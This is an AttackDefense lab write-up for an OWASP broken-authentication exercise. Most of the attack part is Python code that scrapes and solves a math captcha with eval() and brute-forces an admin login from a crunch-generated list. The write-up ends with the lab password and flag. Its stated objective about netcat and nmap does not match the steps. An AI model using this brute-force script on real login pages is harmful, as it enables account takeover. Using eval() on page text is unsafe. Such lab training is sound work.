Name Attacking Login Page: Math Captcha

URL https://www.attackdefense.com/challengedetails?cid=2172

Type OWASP Top 10 : Broken Authentication

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Objective: ​Identify the open ports using netcat and nmap.

Step 1: ​Find the IP address of the target machine.

Command: ​ip addr

The IP address of the attacker machine is 192.133.218.2. The IP address of the target machine
will be 192.133.218.3

Step 2: ​Navigate to the IP address in Mozilla Firefox.

Step 3: ​Right-click on the web page and view the source of the page. Scroll down to view the
source of the page.
The page sends a POST request to "login" endpoint.

The parameters sent with the request are:

1. username
2. password
3. captcha

The captcha is generated between the tag: <h5 style="text-align: center;margin-top: 4px"> and
</h5>

Step 4: ​Write a python script to fetch the captcha and the cookie from the webpage.

import re
import requests

session = requests.Session()
regex = '<h5 style="text-align: center;margin-top: 4px">(.*?) = </h5>'

response = session.get('http://192.133.218.3')
output = re.search(regex, response.text)

print(session.cookies.get_dict())
print output.group(1)

Command: ​python attack.py

Step 5: ​Check the output which is received on the failed attempt. Navigate to the login page and
enter incorrect information.

Step 6: ​Check the output when a correct Captcha is provided.

In step 5 and step 6, on the output page we have a string starting with "Error!". The incorrect
attempts can be identified by the "Error!" string.

The password character set is also revealed in the error message. The password has length 5
and consists of character a,x,4,M and ].

Step 7:​ Create a password list with crunch.

Command: ​crunch 5 5 ax4M] -o passwords.txt

Step 8: ​Modify the python script to iterate over the password list and send a POST request to
the login endpoint along with the required POST parameters.

import re
import requests

session = requests.Session()
regex = '<h5 style="text-align: center;margin-top: 4px">(.*?) = </h5>'

with open('passwords.txt','r') as f:
for password in f:
password = password.rstrip()
response = session.get('http://192.133.218.3')
output = re.search(regex, response.text)
cookies=session.cookies.get_dict()
captcha=eval(output.group(1))
print("Trying Password: "+password)
data={"username":"admin","password":password,"captcha":captcha}
output=session.post('http://192.133.218.3/login', cookies=cookies,data=data)
if("Error" not in output.text):
print("Password Found: "+password)
break
Step 9: ​Execute the python script.

Command: ​python attack.py

The password was found to be ax4M]

Step 10: ​Login to the web application and retrieve the flag.
The flag is ZX7HJKE34PL4323.